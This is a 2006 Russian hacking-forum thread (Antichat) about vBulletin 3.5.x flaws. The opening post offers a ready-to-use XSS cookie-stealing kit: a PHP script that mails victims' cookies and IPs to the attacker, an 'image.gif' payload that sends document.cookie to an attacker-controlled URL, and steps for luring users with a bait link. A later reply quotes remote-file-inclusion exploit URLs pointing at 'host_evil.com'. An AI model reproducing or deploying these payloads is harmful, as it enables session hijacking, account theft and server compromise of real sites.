ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
  #1  
Старый 20.04.2006, 18:06
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

работает отлично!

Код:
( 1 ) 

-------------------------------------------------------------------- 

Name file:  exploit.php 

-------------------------------------------------------------------- 


<?php 
$ip_adresse = $_SERVER['REMOTE_ADDR']; 
if(!empty($ip_adresse)) 
{ 
echo 'il tuo ip и: ',$ip_adresse; 
} 
else 
{ 
echo 'Impossible d\'afficher l\'IP'; 
} 
?> 

<a href="log.php"></a><? 
$xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 
else $visitor_info = $REMOTE_HOST; 
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 
$x1=`host $REMOTE_ADDR|grep Name`; 
$x2=$REMOTE_PORT; 
?> 

<?php 
$cookie = $_GET['c']; 
?> 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 
$today = date("l, F j, Y, g:i a") ; 
$subject = "Xss Vbulletin" ; 
$message = "Xss: Hacking 
Ip: $ip_adresse 
Cookie: $cookie 
Url: $base 
porta usata: $xx1 
remote port: $x2 
Giorno & Ora : $today  \n 
"; 
$from = "From: $myemail\r\n"; 
mail($myemail, $subject, $message, $from); 
?> 



-------------------------------------------------------------------- 

<?php 
$myemail = "YOUR ADDRESS E-MAIL"; 

-------------------------------------------------------------------- 


( 2 ) 

-------------------------------------------------------------------- 

Name file:  image.gif 

-------------------------------------------------------------------- 


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 


-------------------------------------------------------------------- 

location="http://YOUR ADDRESS WEB.com 

-------------------------------------------------------------------- 


( 3 ) 

-------------------------------------------------------------------- 

Like Using 
-------------------------------------------------------------------- 

1°  new thread 
2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 
3°  Submit 
4°  It waits for 

--------------------------------------------------------------------
 
Ответить с цитированием

  #2  
Старый 20.04.2006, 19:31
Аватар для pch
pch
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745

Репутация: 141
По умолчанию

Видимо, работает только при разрешённых html тэгах.
ИМХО - лажа
 
Ответить с цитированием

  #3  
Старый 20.04.2006, 19:31
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?
 
Ответить с цитированием

  #4  
Старый 20.04.2006, 21:14
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Цитата:
Сообщение от VectorG  
что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?

video нужнa ?
 
Ответить с цитированием

  #5  
Старый 20.04.2006, 21:23
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

liauliau - давай сними им видео а то до них это всё плохо доходит...
 
Ответить с цитированием

  #6  
Старый 20.04.2006, 21:24
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

слушай реально сними видео.=)
 
Ответить с цитированием

  #7  
Старый 20.04.2006, 21:55
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию

Цитата:
Сообщение от Lord Nikon  
слушай реально сними видео.=)
ok 1min
 
Ответить с цитированием

  #8  
Старый 20.04.2006, 21:57
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

сплойт гавно
 
Ответить с цитированием

  #9  
Старый 20.04.2006, 22:23
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
Wink

короткое video тут
 
Ответить с цитированием

  #10  
Старый 20.04.2006, 22:37
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
Код:
Remote File Inclusion in VBulletin ImpEx 
Date : 
12 / 4 / 2006 
Software :  
VBulletin ImpEx 
version : 

VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug reside in  : 

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit : 

(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
Discovery by :
Dr.Jr7
GreeTz : 
special greet to Qptan & Mr.SNAKE  & trooq
and to my all frinds in www.lezr.com/vb
see u :}
__________________
Full DNS report
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.5.4 micle Форумы 3 15.04.2006 23:47
Уязвимости форумов phpbb 2.0.15 exbbxak Форумы 105 10.08.2005 20:19
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Уязвимости Vbulletin и здешний форум Монгол Форумы 6 03.12.2004 15:27
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ